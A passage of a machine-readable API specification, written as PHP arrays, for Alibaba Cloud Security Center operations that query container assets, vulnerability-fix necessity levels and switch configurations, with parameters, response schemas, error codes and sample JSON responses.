values:'."\n" ."\n" .'- **add**: The configuration takes effect on the asset.'."\n" .'- **del**: The configuration does not take effect on the asset.', 'type' => 'string', 'example' => 'del', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'string', 'example' => '22', 'title' => ''], 'TargetDefault' => ['description' => 'The default flag for asset configuration.', 'type' => 'string', 'example' => 'add', 'title' => ''], 'TargetType' => ['description' => 'The selection mode for the assets on which the configuration takes effect. Valid values:'."\n" ."\n" .'- **uuid**: Added by individual asset.'."\n" .'- **groupId**: Added by server group.', 'type' => 'string', 'example' => 'uuid', 'title' => ''], 'TargetList' => [ 'description' => 'The group ID or asset UUID on which the configuration takes effect.'."\n" .'> If **TargetType** returns **uuid**, this field indicates the **UUID** of the asset. If **TargetType** returns **groupId**, this field indicates the group ID.', 'type' => 'array', 'items' => ['description' => 'The group ID or asset UUID on which the configuration takes effect.'."\n" .'> If **TargetType** returns **uuid**, this field indicates the **UUID** of the asset. If **TargetType** returns **groupId**, this field indicates the group ID.', 'type' => 'string', 'example' => 'i-bp1hduhk14uekf7i****', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query configured assets of a switch', 'summary' => 'Queries the configured asset information for a specific switch type.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonTargetResultList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCommonTargetResultList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"TargetConfig\\": {\\n \\"Type\\": \\"webshell_timescan\\",\\n \\"Flag\\": \\"del\\",\\n \\"TotalCount\\": \\"22\\",\\n \\"TargetDefault\\": \\"add\\",\\n \\"TargetType\\": \\"uuid\\",\\n \\"TargetList\\": [\\n \\"i-bp1hduhk14uekf7i****\\"\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeConcernNecessity' => [ 'summary' => 'Queries the necessity information for fixing vulnerabilities that you follow.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response messages. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ECC6B3E3-D496-512D-B46D-E6996A6B63EE', 'title' => ''], 'ConcernNecessity' => [ 'description' => 'The list of vulnerability fix necessity levels. Valid values:'."\n" ."\n" .'- asap: high.'."\n" ."\n" .'- later: medium.'."\n" ."\n" .'- nntf: low.', 'type' => 'array', 'items' => ['description' => 'The list of vulnerability fix necessity levels. Valid values:'."\n" ."\n" .'- asap: high.'."\n" ."\n" .'- later: medium.'."\n" ."\n" .'- nntf: low.', 'type' => 'string', 'example' => 'asap', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query necessity information for fixing followed vulnerabilities', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeConcernNecessity'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeConcernNecessity', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ECC6B3E3-D496-512D-B46D-E6996A6B63EE\\",\\n \\"ConcernNecessity\\": [\\n \\"asap\\"\\n ]\\n}","type":"json"}]', ], 'DescribeContainerApps' => [ 'summary' => 'Queries the information about a containerized application.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '166814', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['description' => 'The application value that you want to query. Fuzzy match is supported.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cas-adad-qeqwe', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '200', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ca0a686115432429ca26cf780f5e9fff5', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '30CBF632-109F-596F-97F2-451C8B2A****', 'title' => ''], 'TagValues' => [ 'description' => 'The tag values.'."\n", 'type' => 'array', 'items' => ['description' => 'The tag value.'."\n", 'type' => 'string', 'example' => 'node-exporter'."\n", 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'DescribeContainerApps', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerApps'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerApps', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"30CBF632-109F-596F-97F2-451C8B2A****\\",\\n \\"TagValues\\": [\\n \\"node-exporter\\\\n\\"\\n ]\\n}","type":"json"}]', ], 'DescribeContainerCriteria' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'GroupField', 'in' => 'query', 'schema' => ['description' => 'The search field. Valid values:'."\n" .'- **pod**: pod.'."\n" .'- **appName**: application name.'."\n" .'- **clusterId**: cluster ID.'."\n" .'- **namespace**: namespace.'."\n" .'- **image**: image.'."\n" .'- **containerScan**: container scan.', 'type' => 'string', 'required' => false, 'example' => 'clusterId', 'title' => ''], ], [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The value of the search field. Fuzzy match is supported for application names, node names, namespaces, cluster names, public IP addresses, pod addresses, regions, pods, instance IDs, cluster IDs, and container IDs.', 'type' => 'string', 'required' => false, 'example' => 'cfb41a869c71e4678a97021582dd8a****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'CriteriaList' => [ 'description' => 'The list of supported search criteria.', 'type' => 'array', 'items' => [ 'description' => 'The supported search criteria.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the query condition. Valid values:'."\n" ."\n" .'- **input**: You must manually enter the query field.'."\n" .'- **select**: You must select a subtype of the query condition from a drop-down list.', 'type' => 'string', 'example' => 'input', 'title' => ''], 'Name' => ['description' => 'The name of the query condition.'."\n" ."\n" .'- **instanceId**: container instance ID.'."\n" .'- **clusterId**: cluster ID.'."\n" .'- **regionId**: container region.'."\n" .'- **clusterName**: cluster name.'."\n" .'- **image**: image name.'."\n" .'- **imageRepoName**: image repository name.'."\n" .'- **imageRepoNamespace**: image repository namespace.'."\n" .'- **imageRepoTag**: image repository tag.'."\n" .'- **imageDigest**: image digest.'."\n" .'- **clusterType**: cluster type.'."\n" .'- **hostIp**: public IP address.'."\n" .'- **pod**: pod.'."\n" .'- **podIp**: pod IP address.'."\n" .'- **containerId**: container ID.'."\n" .'- **vulStatus**: whether the container has vulnerabilities.'."\n" .'- **alarmStatus**: whether the container has security alerts.'."\n" .'- **riskStatus**: whether the container has risks.'."\n" .'- **riskLevel**: container risk level.'."\n" .'- **containerScope**: container type.', 'type' => 'string', 'example' => 'clusterId', 'title' => ''], 'Values' => ['description' => 'The available options when **Type** (the type of the query condition) is **select**.'."\n" .'> When **Type** (the type of the query condition) is **input**, this parameter returns an empty value.', 'type' => 'string', 'example' => 'ManagedKubernetes,NotManagedKubernetes,PrivateKubernetes', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve supported search criteria for the container list', 'summary' => 'Retrieves the supported search criteria for the container list.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"input\\",\\n \\"Name\\": \\"clusterId\\",\\n \\"Values\\": \\"ManagedKubernetes,NotManagedKubernetes,PrivateKubernetes\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeContainerFieldStatistics' => [ 'summary' => 'Queries the statistical information about containers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'ContainerGroupedFields' => [ 'description' => 'The statistical information about containers.'."\n", 'type' => 'object', 'properties' => [ 'RiskImageCount' => ['description' => 'The number of the images on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskPodCount' => ['description' => 'The number of the pods on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'NamespaceCount' => ['description' => 'The number of namespaces.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PodCount' => ['description' => 'The number of pods.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AppCount' => ['description' => 'The number of applications.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ContainerCount' => ['description' => 'The number of containers.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ImageCount' => ['description' => 'The number of images.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RiskContainerCount' => ['description' => 'The number of the containers on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterCount' => ['description' => 'The number of clusters.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskAppCount' => ['description' => 'The number of the applications on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskClusterCount' => ['description' => 'The number of the clusters on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of the instances on which risks are detected.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'InstanceCount' => ['description' => 'The number of instances.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeContainerFieldStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerFieldStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerFieldStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"ContainerGroupedFields\\": {\\n \\"RiskImageCount\\": 1,\\n \\"RiskPodCount\\": 2,\\n \\"NamespaceCount\\": 3,\\n \\"PodCount\\": 1,\\n \\"AppCount\\": 3,\\n \\"ContainerCount\\": 1,\\n \\"ImageCount\\": 3,\\n \\"RiskContainerCount\\": 1,\\n \\"ClusterCount\\": 1,\\n \\"RiskAppCount\\": 1,\\n \\"RiskClusterCount\\": 1,\\n \\"RiskInstanceCount\\": 3,\\n \\"InstanceCount\\": 1\\n }\\n}","type":"json"}]', ], 'DescribeContainerGroupedFieldDetail' => [ 'summary' => 'Queries the attribute details of containers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions that are used to query assets. The value of this parameter is in the JSON format. Separate multiple search conditions with commas (,). Example: `[{"name":"riskStatus","value":"YES"},{"name":"riskLevel","value":"2"}]`.'."\n" ."\n" .'> Supported search conditions include the instance ID, instance name, virtual private cloud (VPC) ID, region, and public IP address. You can call the [DescribeCriteria](~~DescribeCriteria~~) operation to query the supported search conditions.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{\\"name\\":\\"clusterId\\",\\"value\\":\\"cfd26658431084c73a48dd97328ba8acf\\"}]', 'title' => ''], ], [ 'name' => 'GroupField', 'in' => 'query', 'schema' => ['description' => 'The filter condition for a grouping and aggregation query. Valid values:'."\n" ."\n" .'* **pod**'."\n" .'* **appName**'."\n" .'* **clusterId**'."\n" .'* **namespace**'."\n" .'* **image**'."\n" .'* **containerScan**'."\n", 'type' => 'string', 'required' => true, 'example' => 'pod', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Pod' => ['description' => 'The name of the pod.'."\n", 'type' => 'string', 'example' => 'node-local-dns-zwsxl', 'title' => ''], 'CreateTime' => ['description' => 'The creation time.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1702433618301', 'title' => ''], 'ContainerCount' => ['description' => 'The number of containers.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Namespace' => ['description' => 'The namespace.'."\n", 'type' => 'string', 'example' => 'default', 'title' => ''], 'ClusterState' => ['description' => 'The status of the cluster. Valid values:'."\n" ."\n" .'* STARTING: The cluster is being started.'."\n" .'* START_FAILED: The cluster fails to be started.'."\n" .'* BOOTSTRAPPING: The bootstrap action is being performed for the cluster.'."\n" .'* RUNNING: The cluster is running.'."\n" .'* TERMINATING: The cluster is being terminated.'."\n" .'* TERMINATED: The cluster is terminated.'."\n" .'* TERMINATED_WITH_ERRORS: The cluster is terminated due to an exception.'."\n" .'* TERMINATE_FAILED: The cluster fails to be terminated.'."\n", 'type' => 'string', 'example' => 'RUNNING', 'title' => ''], 'RegionId' => ['description' => 'The ID of the region.'."\n", 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'AppName' => ['description' => 'The name of the application.'."\n", 'type' => 'string', 'example' => 'node-local-dns', 'title' => ''], 'InstanceCount' => ['description' => 'The number of instances.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterType' => ['description' => 'The type of the cluster. Valid values:'."\n" ."\n" .'* **Kubernetes**: dedicated Kubernetes cluster.'."\n" .'* **ManagedKubernetes**: standard managed cluster (edge cluster).'."\n" .'* **Ask**: serverless Kubernetes (ASK) cluster.'."\n", 'type' => 'string', 'example' => 'ManagedKubernetes', 'title' => ''], 'NodeName' => ['description' => 'The name of the node.'."\n", 'type' => 'string', 'example' => 'shangliang-test', 'title' => ''], 'PodCount' => ['description' => 'The number of pods.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.'."\n", 'type' => 'string', 'example' => 'zhhtest', 'title' => ''], 'PodIp' => ['description' => 'The IP address of the pod.'."\n", 'type' => 'string', 'example' => '192.168.1.1', 'title' => ''], 'ClusterCurrentVersion' => ['description' => 'The version of the current online server in the cluster.'."\n", 'type' => 'string', 'example' => '1.14.8-aliyun.1', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.'."\n", 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeContainerGroupedFieldDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerGroupedFieldDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeContainerGroupedFieldDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"Data\\": {\\n \\"Pod\\": \\"node-local-dns-zwsxl\\",\\n \\"CreateTime\\": 1702433618301,\\n \\"ContainerCount\\": 1,\\n \\"Namespace\\": \\"default\\",\\n \\"ClusterState\\": \\"RUNNING\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"AppName\\": \\"node-local-dns\\",\\n \\"InstanceCount\\": 1,\\n \\"ClusterType\\": \\"ManagedKubernetes\\",\\n \\"NodeName\\": \\"shangliang-test\\",\\n \\"PodCount\\": 1,\\n \\"ClusterName\\": \\"zhhtest\\",\\n \\"PodIp\\": \\"192.168.1.1\\",\\n \\"ClusterCurrentVersion\\": \\"1.14.8-aliyun.1\\",\\n \\"VulCount\\": 1,\\n \\"AlarmCount\\": 1,\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\"\\n }\\n}","type":"json"}]', ], 'DescribeContainerInstances' => [ 'summary' => 'Retrieves the list of container instance information.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Criteria', 'in' => 'query', 'schema' => ['description' => 'The search conditions for assets. This parameter is in JSON format. Note that field names are case-sensitive. The following fields are included:'."\n" ."\n" .'- **name**: the search item.'."\n" .'- **value**: the value of the search item.'."\n" .'- **logicalExp**: the logical relationship between multiple conditions. Valid values:'."\n" .' - **OR**: The conditions are in an OR relationship.'."\n" .' - **AND**: The conditions are in an AND relationship.'."\n" .'> You can search for assets by container ID, cluster ID, cluster name, cluster type, risk level, region, and other conditions. Call the [DescribeContainerCriteria](~~DescribeContainerCriteria~~) operation to query the supported search conditions.', 'type' => 'string', 'required' => false, 'example' => '[{"name":"flag","value":"0|8","logicalExp":"AND"},{"name":"ecsType","value":"!8","logicalExp":"AND"}][{"name":"clusterType","value":"NotManagedKubernetes","logicalExp":"AND"}]', 'title' => ''], ], [ 'name' => 'LogicalExp', 'in' => 'query', 'schema' => ['description' => 'The logical relationship between multiple search conditions. Valid values:'."\n" .'- **OR**: The conditions are in an OR relationship.'."\n" .'- **AND**: The conditions are in an AND relationship.', 'type' => 'string', 'required' => false, 'example' => 'AND', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use it for troubleshooting.', 'type' => 'string', 'example' => '79CFF74D-E967-5407-8A78-EE03B925FDAA', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ContainerInstanceList' => [ 'description' => 'The list of container asset information.', 'type' => 'array', 'items' => [ 'description' => 'The container asset information.', 'type' => 'object', 'properties' => [ 'ImageRepoTag' => ['description' => 'The tag of the image.', 'type' => 'string', 'example' => '0.3.1.0-dfa2010-aliyun', 'title' => ''], 'AppName' => ['description' => 'The application name.', 'type' => 'string', 'example' => 'alibaba-log-controller', 'title' => ''], 'PodIp' => ['description' => 'The pod IP address.', 'type' => 'string', 'example' => '172.24.XX.XX', 'title' => ''], 'VulCount' => ['description' => 'The number of vulnerabilities in the container cluster.', 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], 'HcStatus' => ['description' => 'The baseline risk status. Valid values:'."\n" ."\n" .'- **NO**: No baseline risks exist. '."\n" .'- **YES**: Baseline risks exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'ImageId' => ['description' => 'The image ID.', 'type' => 'string', 'example' => 'registry-vpc.cn-beijing.aliyuncs.com/acs/log-controller@sha256:5b046e2de8c490819125193ee2eb71a66f2cc16c032dcd8b69ead4be1024****', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'cfb41a869c71e4678a97021582dd8a****', 'title' => ''], 'ImageRepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'log-controller', 'title' => ''], 'HostIp' => ['description' => 'The host IP address.', 'type' => 'string', 'example' => '172.24.XX.XX', 'title' => ''], 'Pod' => ['description' => 'The pod name.', 'type' => 'string', 'example' => 'alibaba-log-controller-6f847f8786-mk2mg', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether risks exist. Valid values:'."\n" ."\n" .'- **NO**: No risks exist.'."\n" .'- **YES**: Risks exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'VulStatus' => ['description' => 'Indicates whether vulnerabilities exist in the container asset. Valid values:'."\n" .'- **YES**: Vulnerabilities exist.'."\n" .'- **NO**: No vulnerabilities exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether security alerts exist for the container. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'YES', 'title' => ''], 'Image' => ['description' => 'The container image.', 'type' => 'string', 'example' => 'docker.io/library/nginx:latest', 'title' => ''], 'ImageRepoNamespace' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'example' => 'acs', 'title' => ''], 'ImageDigest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => '5b046e2de8c490819125193ee2eb71a66f2cc16c032dcd8b69ead4be1024****', 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'kube-system', 'title' => ''], 'InstanceId' => ['description' => 'The asset instance ID.', 'type' => 'string', 'example' => 'i-2zegzjyotydfkz9****', 'title' => ''], 'NodeInfo' => ['description' => 'The node information.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'ImageUuid' => ['description' => 'The UUID of the image.', 'type' => 'string', 'example' => '5f23dfbceec289a49ac94e035e2****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the container.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'UpdateMark' => ['description' => 'The update identifier of the container asset.', 'type' => 'string', 'example' => '79cff74d-e967-5407-8a78-ee03b9****', 'title' => ''], 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f92155709d****', 'title' => ''], 'NodeName' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'RiskCount' => ['description' => 'The number of risks.', 'type' => 'string', 'example' => '1', 'title' => ''], 'AlarmCount' => ['description' => 'The number of alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp when the cluster was created, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670368337000', 'title' => ''], 'Exposed' => ['description' => 'Indicates whether the container is exposed to the Internet. Valid values:'."\n" .'- **1**: exposed.'."\n" .'- **0**: not exposed.', 'type' => 'integer', 